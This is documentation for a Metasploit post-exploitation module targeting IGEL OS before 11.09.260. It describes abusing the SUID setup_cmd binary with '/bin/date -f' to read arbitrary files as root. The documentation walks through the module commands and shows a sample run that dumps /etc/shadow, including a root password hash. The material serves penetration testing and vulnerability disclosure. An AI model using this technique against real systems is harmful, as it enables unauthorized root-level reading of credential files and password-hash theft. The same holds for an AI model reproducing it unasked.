documentation/modules/post/linux/gather/igel_dump_file.md
IGEL OS < 11.09.260 with a shell or meterpreter session.
IGEL OS is a Linux-based operating system designed for endpoint devices, primarily used in enterprise environments to provide secure access to virtual workspaces. It focuses on enhancing security, simplifying management, and improving user productivity across various sectors, including healthcare and finance.
In previous versions, /config/bin/setup_cmd was an SUID binary, with a preset
list of files it could execute with elevated permissions. This allowed
/bin/date -f to be used for data extraction as root.
The dumped file is printed to screen and saved as loot.
shell or meterpreter session on an IGEL OS < 11.09.260 hostuse post/linux/gather/igel_dump_fileset SESSION <id>, replacing <id> with the session IDRPATHrun| Name | Description |
|---|---|
| RPATH | File on the target to dump |
msf post(linux/gather/igel_dump_file) > set SESSION 1
SESSION => 1
msf post(linux/gather/igel_dump_file) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf post(linux/gather/igel_dump_file) > run
[*] Executing command on target
[*] Command completed:
games:!!:20409::::::
man:!!:20409::::::
proxy:!!:20409::::::
backup:!!:20409::::::
list:!!:20409::::::
irc:!!:20409::::::
gnats:!!:20409::::::
systemd-coredump:!!:20409::::::
root:$6$BEtW8dG/eZ2nHb2X$vE1ZoeP.Z00bSB6dF9PVNHB3gcT1Wh5U2WUMPDBqBwMmZg.cshgiApIXVmDk.S.RhWTxKoZbZRWyqyMyHkzby.:20409:0:99999::::
rtkit:*:20409:0:99999:7:::
user:*:20409:0:99999::::
ruser::20409:0:99999::::
[*] Post module execution completed